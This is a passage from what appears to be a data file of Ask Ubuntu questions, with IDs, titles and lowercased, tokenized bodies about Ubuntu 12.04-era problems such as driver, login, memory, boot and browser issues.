corporation 6 series/c200 series chipset family pci express root port 2 ( rev b5 ) 00:1c.3 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b5 ) 00:1c.4 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 5 ( rev b5 ) 00:1c.5 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 6 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation hm67 express chipset family lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) 03:00.0 network controller : intel corporation centrino wireless-n 1030 ( rev 34 )
158087	ubuntu 12.04 - after release-upgrade from 11.10 - no more root login ?	question : i did do-release-upgrade on ubuntu 11.10 . now , i have ubuntu 12.04 , and i can login as a normal user , but not as root . on 11.10 , i could login as root without problem . i checked on the console , where root login works fine , and i did sudo passwd to reset the root password just in case , and i can still login on the console , but not on gnome ... why ? where 's the problem ?
158091	brightness goes down for the whole screen , when windows with dark backgrounds are enlarged	the brightness of the whole screen goes down considerably when i enlarge windows with a dark background ( gnome-terminal and ttys for example , as well as games , especially when in fullscreen ) . it 's up to a point sometimes that the text on ttys is only barely visible . the brightness goes up again if i put other windows ( like a regular firefox-window ) in front or when i make the `` problematic '' windows smaller . it also happens if a browsser-window shows lots of dark/black background , but it seems that the effect is more severe the more of that darkness is shown . i use ubuntu 12.04 and nvidia-drivers 302.17 ( problem occured for many months , with 11.10 and older nvidia-drivers as well ) .
158093	how do i convert a png to pdf with only the default packages on 11.10 ?	openning a png file in ubuntu , i can see the menu item for 'print to file ' . how can i do the same on shell ? ps : i prefer installing no extra package , due to lack of root access . edit : the operating system is ubuntu 11.10
158095	running a terminal-type command in my application	i want to create an ubuntu application which has a gui for a cli-application . i want to run a terminal command , for example , on a button click in my application . how can i do this ? or should i really not being doing this ? can i also grab what would be displayed as the last/current line when running the terminal command ? ( i am writing my app using quickly as described here )
158097	how can i tweak virtual desktops ?	the single biggest feature of ubuntu that i absolutely love is the virtual desktops . the ability to have four different workspaces - one for chat , one for developer tools , one for web tabs , and miscellaneous has basically decoupled me from a second monitor . i can now roam freely with my laptop and still be effective at my job . but its not perfect and i 'd love a chance to tweak it - add more desktops , change the shape , any other options that exist . what is the best way to do this ?
158098	why does trying install 12.04 64-bit cause a panic with `` machine check exception '' ?	when trying to install ubuntu-12.04-desktop-amd64.iso from usb i get one of the following errors http : //en.wikipedia.org/wiki/machine_check_exception states the error can occur due to -poorly fitted heatsink/computer fans ( the same problem can happen with excessive dust in the cpu fan ) -an overloaded internal or external power supply ( fixable by upgrading ) so i tried the following -using rubbing alcohol to remove all the thermal paste from the cpu and heatsink , i then reseated the cpu after checking all the pins on the mobo , everything seems fine . -boot without the gpu to see if was the psu that is being over stressed . -removing all ram apart from one stick and running a memtest86 which it passed -using ubuntu 10.04.4 desktop 64 bit ( different usb slots and usb sticks ) -using ubuntu 12.04 desktop 64 bit ( different usb slots and usb sticks ) -reset the bios using the clear cmos jumper -removing all hd power cables and sata cables -updating the bios from f2 to f6 my pc is using the following parts . -gigabyte ga-z77-ds3h ( f6 bios ) -intel core i7 3770k 3.5ghz socket 1155 -g-skill 8gb ( 2x4gb ) ddr3 1600mhz ripjawsx memory kit cl9 ( 9-9-9-24 ) 1.5v -be quiet shadow rock pro -be quiet pure power 730w modular psu -sapphire hd 6870 1gb gddr5 dvi hdmi displayport pci-e graphics card any ideas ?
158099	easiest authentication for lan networks ?	there are a lot clients inside a lan . the server is trusted , the clients are not . it has to be ensured that other clients can not spoof another clients or the servers lan ip address . i want to prevent to bothering with something like openvpn or ipsec , because encryption is not required ( lan ) and those solutions are overkill and complicated to learn . are there any simple alternatives ?
158106	installation after boot shows no display	i just booted 12.04 for installation from usb-stick . but there is a problem with the display . after boot i see a rectangle on the lower left corner of the screen , after a while i see `` ubuntu 12.04 ... '' loading from usb-stick , the ubuntu-desktop starts fine , clicking on ubuntu-install seems to work ... till identification , then installation-window closed and ... nothing more happens . so i want to try installation direct from the menu at the beginning - before ubuntu-12.04-loading . butt i can not see any menus at that time . i think there is an graphic-problem ? how can i get the installation by menus , how would the installation via desktop going to work ? edit : ... the point is , that i can not see the `` menu '' with `` try ubuntu '' etc . i now tried to make a blind input f6 etc . the result is the ubuntu-desktop with the install-icon ... that breaks after input of the identity : - ( i think , that there is a graphic-problem before initiating the start-up-menu ...
158109	macbook pro 8.2 wifi keeps disconnecting , ubuntu 12.04	i am using a macbook pro 8.2 with ubuntu 12.04 , and my wifi disconnects consistently . i followed the directions as detailed here here , however , and it works up to expected speeds , but after within an hours time , the wifi disconnects and the only way to solve the issue is to either reboot or disable wireless and re-enable it . lsmod | grep cfg80211 outputs : cfg80211 178818 2 b43 , mac80211 i suspect that i did not blacklist the correct driver and there are two drivers causing instability , however i have no idea if i actually did it correctly .
158110	how to use oss instead of pulseaudio ?	sound was working fine with pulseaudio , but i installed something in order to try to get xawtv to work , but that just caused the audio to stop working . so i tried to install some packages to get oss to work , because i read that oss is better than pulseaudio ( is that true ? ) anyway , i 'm unable to get oss to work either . what packages do i need to install , and how do i get this set up ?
158112	xvkbd broken with warnings	i 'm using the latest version of ubuntu and i ca n't run xvkbd properly . i get these errors : $ xvkbd warning : can not convert string `` -*-lucidatypewriter-bold-r-*-*-12-*-*-*-*-*-iso8859-1 '' to type fontstruct xvkbd : mode_switch not available as a modifier xvkbd : although iso_level3_shift is used instead , altgr may not work correctly warning : can not convert string `` -*-lucida-bold-i-*-*-14-*-*-*-*-*-iso8859-1 '' to type fontstruct xvkbd : mode_switch not available as a modifier xvkbd : although iso_level3_shift is used instead , altgr may not work correctly how can i solve this ? i 'm trying to use this with xbindkeys .
158115	how can i figure out why suspend sometimes fails ?	something is causing suspend crash occasionally . when it does crash , the system freezes with a black screen and stays on , not suspending . this makes me have to hold the power button until the system shuts down . one setting difference i have from most people is , i do n't use the option that lets you suspend when the laptop lid is closed . so opening and closing the laptop lid has no actions . i like to press suspend manually . could this preference change be the cause ? how can i start looking for what 's causing the crash , since the crash does n't display errors ?
158120	ubuntu 12.04 - workspace switcher is shown after switching to another workspace	i 've just upgraded to ubuntu 12.04 on hp envy 14 and found a rather interesting bug . when i switch between workspaces using keyboard shortcuts , for example moving down to workspace 3 from workspace 1 , workspace switcher is shown ( as seen on below screenshot ) . it stays there until i hit escape key . after debugging , the problem only happens when i change shortcut keys to super + direction . with default ctrl + alt + direction , everything is ok . i 've searched but have n't found this problem reported before , i 'm also not sure this is called workspace switcher : ) can you please let me know what to search for , are there any logs which might have some related information ?
158122	ubuntu 11.10 to 12.04 results in loss of n network capability - how to restore ?	on ubuntu 11.10 , i had zero issues with n network detection and speed . i can not remember whether the old driver was iwlagn or iwlwifi . this was with ubuntu repository linux kernel 3.0.0-22 . upon upgrading to ubuntu 12.04 , iwlwifi is the available driver and while it detects n networks , upon connection , the speed is cripplingly low and dns look-ups do not occur ( impossible to browse ) . this is with ubuntu repository linux kernel 3.2.0-26 . please note that the 11n_disable flag for the iwlwifi module can not work for me as i require n network access . is there another solution ? perhaps , is there a way to easily patch the new kernel with the old wireless module ( just copy-and-paste the iwlagn module into the new kernel source and re-compile ) ? relevant hardware specs : dell inspiron n5110 network adapter : intel速 centrino速 wireless-n 1030
158127	no orca magnification in ubuntu 12.04	i 'm a visually impaired linux/ubuntu newbie . i 've installed 12.04 from a live cd and have the orca screen reader running at start up . speech works fine but there is no magnification . when i open orca preferences there is no magnification tab . i have tried uninstalling orca and re-installing if from the software centre , but still no magnification . can anyone tell me how to add magnification to orca ?
158133	why does ubuntu one for android use nonfree libraries ?	ubuntu one for music source code on launchpad contains libgoogleanalytics.jar which is proprietary . the license declares gnu affero gpl license . is this legal and why is it done ?
158137	problem with theming my application with css	i 'm trying to beautify my program made with quickly using css . i found documentation http : //developer.gnome.org/gtk3/3.4/gtkcssprovider.html and very useful blog post http : //erikos.sweettimez.de/2011/11/24/gtk-3-theme-style-your-applications-2/ according to the above i should be able to use id selectors , for example : # nameofmywidget { font : ubuntu 12 ; } unfortunately this does not work . only working way for me is using : gtkentry { font : ubuntu 12 ; } or : .entry { font : ubuntu 12 ; } but it 's to generic . apart from that i 'm not able to change gtkentry and gtkbutton backgrounds . any help much appreciated . -- -- -- -- -- -- -- -- -- -- -edit -- -- -- -- -- -- -- -- -- -- i found a way to change gtkentry and gtkbutton background colours . instead of using : gtkentry , gtkbutton { background-color : # ffffff ; } i 've used : gtkentry , gtkbutton { background : # ffffff ; }
158139	what app tests all of gtk 's ui elements ?	i 've seen it in screenshots before . what application provides a window that contains all of gtk 's ui elements ? i need an answer applicable to gtk+2 and gtk+3 .
158141	free ram disappears - memory leak ?	on a fresh started system , free reports about 1.5g used ram ( 8g ram alltogether , ubuntu 12.04 with lightdm and plasma desktop , one konsole window started ) . having the apps running i use , it still consumes not more than 2g . however , having the system running for a couple of days , more and more of my free ram disappears -- without showing up in the list of used apps : while smem -- pie=name reports less than 20 % used ( and 80 % being available ) , everything else says differently . free -m for example reports on about day 7 : total used free shared buffers cached mem : 7459 7013 446 0 178 997 -/+ buffers/cache : 5836 1623 swap : 9536 296 9240 ( so you can see , it 's not the buffers or the cache ) . today this finally ended with the system crashing completely : the windows manager being gone , apps `` hanging in the air '' ( frameless ) -- and a popup notifying me about `` too many open files '' . syslog reports : kernel : [ 856738.020829 ] vfs : file-max limit 752838 reached so i closed those applications i was able to close , and killed x using ctrl-alt-backspace . x tried to come up again after that with failsafex , but was unable to do so as it could no longer detect its configuration . so i switched to a console using ctrl-alt-f2 , captured all information i could think of ( vmstat , free , smem , proc/meminfo , lsof , ps aux ) , and finally rebooted . x again came up with failsafex ; this time i told it to `` recover from my backed-up configuration '' , then switched to a console and successfully used startx to bring up the graphical environment . i have no real clue to what is causing this issue -- though it must have to do either with x itself , or with some user processes running on x -- as after killing x , free -m output looked like this : total used free shared buffers cached mem : 7459 2677 4781 0 62 419 -/+ buffers/cache : 2195 5263 swap : 9536 59 9477 ( ~3.5gb being freed ) -- to compare with the output after a fresh start : total used free shared buffers cached mem : 7459 1483 5975 0 63 730 -/+ buffers/cache : 689 6769 swap : 9536 0 9536 two more helpful outputs are provided by memstat -u . shortly before the crash : user count swap uss pss rss mail 1 0 200 207 616 whoopsie 1 764 740 817 2300 colord 1 3200 836 894 2156 root 62 70404 352996 382260 569920 izzy 80 177508 1465416 1519266 1851840 after having x killed : user count swap uss pss rss mail 1 0 184 188 356 izzy 1 1400 708 739 1080 whoopsie 1 848 668 826 1772 colord 1 3204 804 888 1728 root 62 54876 131708 149950 267860 and after a restart , back in x : user count swap uss pss rss mail 1 0 212 217 628 whoopsie 1 0 1536 1880 5096 colord 1 0 3740 4217 7936 root 54 0 148668 180911 345132 izzy 47 0 370928 437562 915056 edit : just added two graphs from my monitoring system . interesting to see : everytime when there 's a `` jump '' in memory consumption , cpu peaks as well . just found this right now -- and it reminds me of another indicator pointing to x itself : often when returning to my machine and unlocking the screen , i found something doing heavvy work on my cpu . checking with top , it always turned out to be /usr/bin/x :0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch -background none . so after this long explanation , finally my questions : what could be the possible causes ? how can i better identify involved processes/applications ? what steps could be taken to avoid this behaviour -- short from rebooting the machine all x days ? i was running 8.04 ( hardy ) for about 5 years on my old machine , never having experienced the like ( always more than 100 days uptime , before rebooting for e.g . kernel updates ) . this now is a complete new machine with a fresh install of 12.04 . in case it matters , some specs : amd a4-3400 apu with radeon ( tm ) hd graphics , using the open-source ati/radeon driver ( so no fglrx installed ) , 8gb ram , wdc wd1002faex-0 hdd ( 1tb ) , asus f1a75-v evo mainboard . ubuntu 12.04 64-bit with kde4/plasma . apps usually open more or less permanently include evolution , firefox , konsole ( with midnight commander running inside , about 4 tabs ) , and libreoffice -- plus occasionally calibre , gimp and moneyplex ( banking software i 'm already using for almost 20 years now , in a version which did fine on hardy ) . edit : today i found one of the `` evil guys '' : kde4s plasma-desktop . used memory was again up to 5gb , when i did a killall plasma-desktop & & plasma-desktop . this freed up 1.3gb ram ! ps says : rss size vsz plasma usage before restart 120988 526472 1300816 plasma usage after restart 92352 495972 1263632 so where have those 1.3gb been ? the diff between those values , if added up , amount to 96mb -- not 1.3gb . and this can only be one part , as still 3.7gb are in use ( should be less than 2gb ) . i monitored this during the past 6 days using several tools : used memory ( not talking about cache and buffers ) increases slowly but steadily . even if i 'm not at my desk to run anything ... as to monitoring processes with open files , i currently use the following 1-liner ( i love shell and especially bash ) to get the top-5 : echo `` $ ( for pid in $ ( ls -a /proc|egrep '^ ( [ 0-9 ] ) * $ '|sort -n 2 > /dev/null ) ; do \ if [ -e /proc/ $ pid/fd ] ; then fhc= $ ( ls -l /proc/ $ pid/fd|wc -l ) ; \ if [ $ fhc -gt 0 ] ; then pname= '' $ ( cat /proc/ $ pid/comm ) '' ; \ echo `` $ fhc files opened by $ pid ( $ pname ) '' ; fi ; fi ; done ) '' |sort -r -n|head -n5 command here in 4 lines for better readability . nothing much yet from there -- except that skype does n't like have the internet connection broken . each disconnect causes a slight increase of its open files , but nothing dramatic . on the other hand it seems like plasma is also responsible for that : see the drop of file handles at the end ? that was the plasma restart .
158148	why does apt-get keep waiting for headers on oracle repository ?	i have this at the end of my /etc/apt/sources.list to retrieve oracle code : deb http : //oss.oracle.com/debian unstable main non-free when i run sudo apt-get update , the app gets stuck displaying this message : 100 % [ waiting for headers ] if i remove this , apt-get update runs without error . is there a new , recommended url for oracle products and , generally , how do you fix this problem ? i am pretty sure this did not happen on 11.10 and has only started with the move to 12.04 . i have seen these answers and they do not help : apt-get update stuck on `` waiting for headers '' http : //ubuntuforums.org/showthread.php ? t=1689579 http : //muffinresearch.co.uk/archives/2010/03/30/linux-fix-for-apt-get-update-waiting-for-headers/ http : //www.kubuntuforums.net/showthread.php ? 57567-ubuntu-problems-on-update
158150	how to remap capslock key to ctrl in xubuntu	i 'm trying to remap my capslock key to ctrl key as described here ( adding /usr/bin/setxkbmap -option `` ctrl : nocaps '' command to `` session and startup '' - > '' application autostart '' ) . but this does n't work in xubuntu 12.04 . when i 'm running the same command ( /usr/bin/setxkbmap -option `` ctrl : nocaps '' ) from terminal everything works as expected . if i change command to : sh -c `` /usr/bin/setxkbmap -option \ '' ctrl : nocaps\ '' '' it again works if i 'm running it from terminal , but it does n't work if i add it to xfce `` session and startup '' configurator . also when i create a script like this : # ! /bin/sh /usr/bin/setxkbmap -option `` ctrl : nocaps '' and add it to startup via `` session and startup '' configurator , it has no effect at all . but if i run this script after login it actually remaps caps key as expected .
158152	no user/password boxes on login screen after updates today ( june 30 , 2012 )	just installed today 's batch of updates , including new kernel 3.2.0-26 and rebooted . now the screen just has a logo in the middle and `` ubuntu 12.04 lts '' in bottom left corner , but no box to choose which user to log in as , or to enter a password . ctrl-alt-f1 gets me to a `` login : '' prompt , and i can log in - but i have no idea what to look at to find out what is wrong , or to fix this . tried older kernels and recovery mode for current kernel - no joy , still no way to log into the graphics console .
158155	will matplotlib 1.2 be in 12.04 or 12.10 ?	i found windows installers for matplotlib 1.2 for python3 at this site : http : //www.lfd.uci.edu/~gohlke/pythonlibs/ when will i be able to install matplotlib for python3 in ubuntu from repositories ? will it be in 12.04 at all , or will i have to wait until 12.10 ?
158158	how to install mozilla firefox on kubuntu 12.04 ?	i have installed kubuntu 12.04 on my netbook . each time i invoke the firefox installer , it downloads a package , and nothing happens . thanks for help in advance .
158159	how do i get terminator to start up with my custom layout ?	terminator is very powerful at organizing several computers or servers due to the split window and group all function . but here 's the deal : i created my own layout and would appreciate it to load at startup of terminator . is that possible ?
158164	why ca n't i install windows 8 in virtualbox on 12.04 ?	note : this appears to be a problem with windows 8 , no matter what host os virtualbox is running on . i recently tried to install windows 8 rp 32-bit in virtualbox using ubuntu 12.04 as the host . i have tried multiple settings for memory , hard drive size , etc . every single time it has come up with this error your pc needs to restart . please hold down the power button error code : 0x0000005d parameters : 0x0306170a , 0x756e6547 , 0x49656e69 , 0x6c65746e i really like windows 8 and i would like to know how to fix this some time soon .
158167	why does installing 11.10 or 12.04 on old laptops fail ?	i recently reimaged my lenovo t400 with ubuntu . however , after wiping two other systems ( compaq presario 2100 and dell latitude d600 ) both ubuntu 11.10 and ubuntu 12.04 fail to load on boot . i am concerned that there is some type of issue using ubuntu on these older systems as every part of the process has been repeated/attempted several times in the same manner as practiced in the successful load of the newer lenovo t400 . i now have two laptops without an operating system as the discs/thumb drives that were formatted to load on these devices do not seem to work . i would appreciate any assistance that you may be able to provide .
158169	why do i get the message `` program not found '' when running `` mal '' for latex	just started using ubuntu ( 11.10 oneiric ) . it is running on a virtual machine . i used to use suse . however , suse is now with novel , which goes hand in hand with microsoft . so now shifted to ubuntu . for documentation i use latex and installed a package . this package uses a pre-processer ( it is called `` mal '' ) . i ran the textconfig rehash command as required , but when i try to run the program , i get a `` program not found '' error . i am guessing that it is not in my path . ( a sudo did not help ) any idea ?
158170	why wo n't my logitech k750 solar keyboard work at the login screen ?	if the keyboard was not touched when on grub , the keyboard will not function at the login screen . any other person with same problem and how to fix it ? using ubuntu12.04 ( 3.2.0-26-generic-pae )
158171	why is thunderbird pegging a core at 100 % ?	i have experienced 2-3 unexplained lockup over last 10 days . today , i had a random lockup ( no mouse , keyboard response , 100 % cpu ) . but , when i finally switched ( ctrl-alt-f1 ) to command line ( it took several minutes ) it told me that thunderbird-bin had locked a cpu . i ran this to resolve : pidof thunderbird-bin sudo kill # # # # however , after saving other work , i tried restarting thunderbird . it went to 90 % + cpu , and within 20 seconds it locked again . once i have more detail i will raise a bug ( on ubuntu forums ) . does anyone have any other suggestions , advice ? update : ( sep-2012 ) thunderbird 13.0.1 is quite stable in safe mode . still working to resolve .. update 2 : ( jan-2013 ) now running thunderbird 17.0.2 ( ubuntu 12.04 ) . still have all plugins disabled . works well , and does everything i need . not attempting to resolve .
158182	why does hdmi sound stop working when not used ?	when not used for a few hours the sound stops working on my htpc . to get sound to work again i have to unplug the hdmi cable and plug it back in again when this sound `` outage '' occurs , the hdmi device dissapears from the sound config output devices i see the following in dmesg [ 78534.010328 ] hdmi hot plug event : codec=0 pin=3 presence_detect=0 eld_valid=0 [ 78534.010363 ] hdmi status : codec=0 pin=3 presence_detect=0 eld_valid=0 [ 78558.948403 ] hdmi hot plug event : codec=0 pin=3 presence_detect=1 eld_valid=1 [ 78558.948429 ] hdmi status : codec=0 pin=3 presence_detect=0 eld_valid=0 [ 78562.579047 ] hdmi hot plug event : codec=0 pin=3 presence_detect=1 eld_valid=0 [ 78562.579078 ] hdmi status : codec=0 pin=3 presence_detect=1 eld_valid=1 [ 78562.579992 ] hdmi hot plug event : codec=0 pin=3 presence_detect=0 eld_valid=1 [ 78562.580043 ] hdmi status : codec=0 pin=3 presence_detect=1 eld_valid=1 [ 78562.876030 ] hdmi status : codec=0 pin=3 presence_detect=1 eld_valid=1 [ 78563.176036 ] hdmi status : codec=0 pin=3 presence_detect=1 eld_valid=1 [ 78563.195139 ] hdmi hot plug event : codec=0 pin=3 presence_detect=0 eld_valid=0 [ 78563.195169 ] hdmi status : codec=0 pin=3 presence_detect=0 eld_valid=0 [ 78563.476030 ] hdmi status : codec=0 pin=3 presence_detect=0 eld_valid=0 [ 78635.529493 ] hdmi hot plug event : codec=0 pin=3 presence_detect=1 eld_valid=1 [ 78635.529524 ] hdmi status : codec=0 pin=3 presence_detect=0 eld_valid=0 [ 78641.330701 ] hdmi hot plug event : codec=0 pin=3 presence_detect=1 eld_valid=0 [ 78641.330733 ] hdmi status : codec=0 pin=3 presence_detect=1 eld_valid=1 [ 78641.331649 ] hdmi hot plug event : codec=0 pin=3 presence_detect=0 eld_valid=1 [ 78641.331668 ] hdmi status : codec=0 pin=3 presence_detect=1 eld_valid=1 [ 78641.628050 ] hdmi status : codec=0 pin=3 presence_detect=1 eld_valid=1 [ 78641.928037 ] hdmi status : codec=0 pin=3 presence_detect=1 eld_valid=1 [ 78642.228042 ] hdmi status : codec=0 pin=3 presence_detect=1 eld_valid=1 [ 78642.528039 ] hdmi status : codec=0 pin=3 presence_detect=1 eld_valid=1 [ 78642.828037 ] hdmi status : codec=0 pin=3 presence_detect=1 eld_valid=1
158186	how can i get my mysqld-swamped cpu under control ?	i was afk for about 24 hours and came back to find gnome-system-monitor saying all four cpu cores on my laptop were running at full throttle . mysqld is taking up more than one full core ; when i tried to end the process , it restarted with a new pid . then there 's ksoftirqd/0-3 , which apparently has something to do with interrupts , but i ca n't tell from google what i 'm supposed to do with those four particular processes . they 're taking up a quarter or more of my processor cycles . then there 's chrome , but i can probably handle that on my own -- how do i cool down the other processes giving me problems ?
158189	lenovo ideadpad s10-3c problems	please help me fix these problems because i really like ubuntu 12.04 and i have replaced my windows 7 ultimate for this . everytime i turn on my ideapad it hangs , but when i insert my usb device that i used for the installation and restart my ideapad , it works . how can i open my lenovo without my usb device ? my keyboard does n't work . i pressed each key and none of it works . those are my first two problems . i have n't tried the microphone , speaker and webcam yet because i ca n't even type a single letter . please do fix this problem .
158191	fan always on and overheating problems on hp g62	i have a hp g62 with i5 processor , 4g ram and ati hd 5470 . started using ubuntu 4 months ago , first was 11.10 and after 12.04 . everything worked perfectly until some weeks ago when my cpu fan became `` crazy '' and i mean by this always on , noise and overheating problems , for sure if i put a glass with water in some minutes will boil ( and i mean it ) . there can be a bug in the last kernel or any other ubuntu 's official update ? and by the way cpu fan is cleaned like a new born baby ; used jupiter and all those stuff ( lm-sensor , psensor ... ) - same problem ; installing ati drivers do n't work very well . ( interface laggy as hd 5470 is n't supported by ubuntu ) and i ca n't even open ati catalyst ( error when i try to open it ) , more than this i always used open source drivers and as i said , worked perfectly ( 3d , effects ) . right now i 'm back to windows and everything is working perfectly but my main problem is that i get used with ubuntu and kinda weird to use windows again . i want back my nice and almost perfect ubuntu .
158197	new 12.04 install grub hangs on first boot	on a new computer build , i installed 12.04 desktop 64bit from a usb stick . when i rebooted , it hangs . it writes `` grub '' on the upper left and then nothing else . the bios setup program has boot options for `` efi : [ hard drive id ] '' and `` [ hard drive id ] '' . they both result in a hung boot . any ideas on why its hanging and how i should change it ? details ... during the install i removed the old hard disk partitions and created the following partitions . 40gb ext4 used for ubuntu 12.04 root 40gb empty ( i plan to install windows 7 later ) 4gb swap 80gb fat32 ( for data accessible from ubuntu and windows ) . hardware is ... gigabyte ga-z77x-ud3h intel core i7-3770 2x 8gb ram 160 sata hard drive -- bobg update : i booted ubuntu live , installed the boot-repair ppa , ran it and it fixed the boot problem . i also think i now know why this happened . i did manual partitioning ( i.e . the `` something else '' option ) and i did not pay much attention to the dropdown box near the bottom . i now realize that that box determines where the boot loader goes . i think i had it set to the wrong partition .
158200	how to re-enable trackpad accidentally disabled it using third party software ( jupiter )	im an ubuntu noob , i accidentally disabled my trackpad using the jupiter power management software , but cant seem to be able to re-enable it . tried rebooting the system to no avail . any ideas on how to re-enable the trackpad would be useful .
158202	why does chrome crash on websites using the awesome font ?	since github using webfront for icons , every time i open github website that tab will crash . but other websites are not crash . i did everything i can , like disable all extensions , clean all cache , even create a new user profile , still not working . i 'm using ubuntu linux 12.04 , last stable google chrome browser , always up to date . i searched from google and not found any one has the issue like mine . and i found any website using font-awesome my chrome tab will crash if i open that website .
158204	problem compiling with link -lstdc++	i 'm new using linux ( ubuntu 12.04 lts , 64-bit ) . i am trying to learn how to create binary files for a program called tecplot . i 've been trying to compile the example file simtest.f90 , using this : $ gfortran -fcray-pointer -lstdc++ simtest.f90 tecio64.a when i do this , i get a huge list of errors like this : tecio.a ( tecxxx.o ) .gnu.linkonce.d.dw.ref.__gxx_pe rsonality_v0 [ dw.ref.__gxx_personality_v0 ] +0x0 ) : undefined reference to '__gxx_personality_v0' tecio.a ( translatedstring.o ) .gnu.linkonce.d._ztin 7tecplot7strutil16translatedstringe [ typeinfo for tecplot : :strutil : :translatedstring ] +0x0 ) : undefined reference to `vtable for _cxxabiv1 : :_class_type_info' i 've been reading several forums , and it looks like this is the kind of error you get when you do n't link the libstdc++ library ( in fact , if i remove the link -lstdc++ i get the exact same error ) . if anyone can help me , i would appreciate it .
158205	memory usage does n't add up	if i add up all the memory usage i get from top -b -n 1 or htop or ps aux , i get a number that is a few gb under what i get with free . the kernel could account for some of that memory , but not up to a few gb , could it ?
158207	firefox consuming wildly inordinate amount of cpu	i 've got a firefox process with nothing in it but the google home page ( the `` search '' page , not the `` homey '' home page with news etc . ) and this site . i 've killed it and restarted it multiple times . it 's burning massive amounts of cpu cycles doing ... what ? i notice that firefox , over time , leaks memory terribly and uses more and more cpu , but not anything close to this much . what is it doing ? at present it 's the primary process loading down the system , and that 's new behavior . eating memory and getting bloated is usually something that makes it sluggish . now it 's just hogging resources and spinning my fan . i 'm running 12.04 on an hp laptop but that should n't matter of course . are there some firefox tools for looking at its internal thread activity or something ? edit newly-created profiles show exactly the same behavior ...
158209	why does unity screen blank out over xdmcp ?	my xdmcp sessions display fine until i login . i 've checked all logs and settings for this and ca n't find anything wrong , this works fine on other systems so i 'm wondering if this has anything to do with the underlying hardware or an application that loads when logging in . system details : - ubuntu 12.04 ( desktop , installed via alternate cd for raid ) - 8gb of ram - core2quad cpu @ 2.40ghz - gigabit network ( ethernet ) other notes : - running with the onscreen keyboard enabled - works fine when logging in locally pre-login : once logged in :
158210	how can i recover data after mistakenly clean-installed 12.04 over 11.10 ?	i recently got a ubuntu 12.04 lts i386 dvd rom and ubuntu 12.04 lts alternate cd from the zyxware.com because i do n't have a broadband personal connection at home , i am using only the office internet . i have a dell inspiron laptop core 2 duo processor with 2gb ram dual boot of ubuntu 11.10 and windows vista . i tried to upgrade my existing fully equipped streamlined ubuntu 11.10 os with lot of documents and socialized application packages which have been frequently used by me for the last one year . first i tried to install upgradation from the ubuntu 12.04 lts alternate cd while ubuntu 11.10 is on , but every time i got a error message and i could n't upgrade either thro desktop or through terminal . then i tried ubuntu 12.04 lts i386 dvd the boot option to dvd , i tried to upgrade from existing 11.10 to 12.04 lts option , then upgrading installation started well and finally got a message installation completed successfully , asked for reboot , i rebooted then i have hot a ubuntu 12.04 lts login and i logged on , i have got a big shock that there is everything washed away in the home folders ( all datas , music collections and vedios etc ) , all the application installed early in 11.10 were gone nothing left . now i have got only 12.04 lts , even it is asking for me to update around 350 mb through net connection . how it was a crazy ubuntu , it is not a up-gradation , new installation is not it ? i loosed everthing , at the end i got the same desktop screen like ubuntu 11.10 . anybody knows about what gone wrong and if any possibility to recover my datas ? please help me . i want to know that which method is stable to upgrade existing ubunt11.10
158216	how to make google chrome not start as service ?	i found google chrome running as service after i installed it , at each reboot . this would not be a problem , if it wo n't eath 100 % cpu . i would not like to uninstall it , but i 'll be forced to do that if i ca n't find a way to disable its remain in memory as a service . i could n't find anything in boot-up-manager , so i 'm asking where to search ...
158220	can i recover a deleted partition table faster if i remember some of the layout ?	i accidentally deleted the partition table of a 1.5tb drive with about 10 partitions on it ; i 'm running testdisk now but it 's going to take a while to scan everything . i do have some useful information which i 'm hoping can speed things up - the partition layout and filesystem types ( mostly ntfs , some fat32 , ext3/4 ) . unfortunately there are a few unknowns with the partition sizes . i do have another disk with a backup of ( most ) of the partitions , but there may still be some unknowns . is there any way to use the information i do have to speed up the partition table recovery , or do i just need to wait for the exhaustive scan to finish ?
158222	google-talkplugin not working in ubuntu 12.04 64bit	google-talkplugin is not working for me on ubuntu 12.04 ( precise ) 64-bit , i have reinstalled the system many times to get it to work but still it does n't . the problem is not with apparmor as i have checked it with strace firefox . anyone else has it ? do you have any ideas & workarounds ? what can i do to help fix it as i could n't find a google bug tracker for the plugin ?
158227	how do i fix error building package on ppa , uses tweepy/quickly	i 'm building an application that uses tweepy ( a python library ) and when i build it on my local machine it works fine . when i submit it to launchpad though , it sent me a log which has this error : error : python module tweepy not found . i found a ppa python-tweepy on launchpad . so how do i fix this error . the log from launchpad is here .
158229	ubuntu 's network connection manger ca n't detect huawei ets2051 modem device !	i have a modem device called huawei ets2051 and the network connection manger ca n't detect it , but when i use gnome-ppp it work fine but the problem is when i use gnome-ppp ; apps like ubuntu software center ca n't reconice that 's iam connecting to the internet so the app is just act like it 's offline while other apps like web browsers and im 's work good under gnome-ppp . any way what i want is to have a full ubuntu experince by making the network connection manger detect my ets2051 . more information : gnome-ppp is a gui for wvdial . the ets2051 modem use a serial usb port . i have a windows driver cd for the device . i have also find this qustion about the software center acting like it 's offline around wvdial and there 's this launchpad bug . and am really insest to use ubuntu software center so please no other software manger apps recomendation ...
158237	chrome window freezes in ubuntu	sometimes , especially when i open pages that have some kind of multimedia contents , chrome freezes . it always happens directly after opening a new tab . in contrast to the way chrome usually has only tabs crashing , the entire windows freezes . if i have multiple separate chrome windows open , the others keep working . i run ubuntu 12.04 and chrome in version 20.0.1132.47 but this has been going on since i last set up my machine around half a year ago . anyone having the same problems or an idea what could be wrong here ?
158241	automatically change sound input output device	i have to plugin my usb audio adapter ( 4300054 gigawire usb audio adapter ) for audio input because has a combo-input-output port for voice . after i do this , i have go open sound settings and manually select the usb audio adapter for input and output , if i do not , the system default remains selected . is there anyway , i can make ubuntu to automatically select the usb audio adapter as the default as soon as i plug-in ?
158243	how do i get gwaei to work in 12.04 ?	gwaei used to run in 11.10 , but in 12.04 i get a blank window to open and it just hangs from there , requiring a force-quit to close . i submitted a bug to the gwaei launchpad bug report site and while there has been a response , i do n't really understand much of it . can somebody explain to me in simple english how i can get this thing to work ?
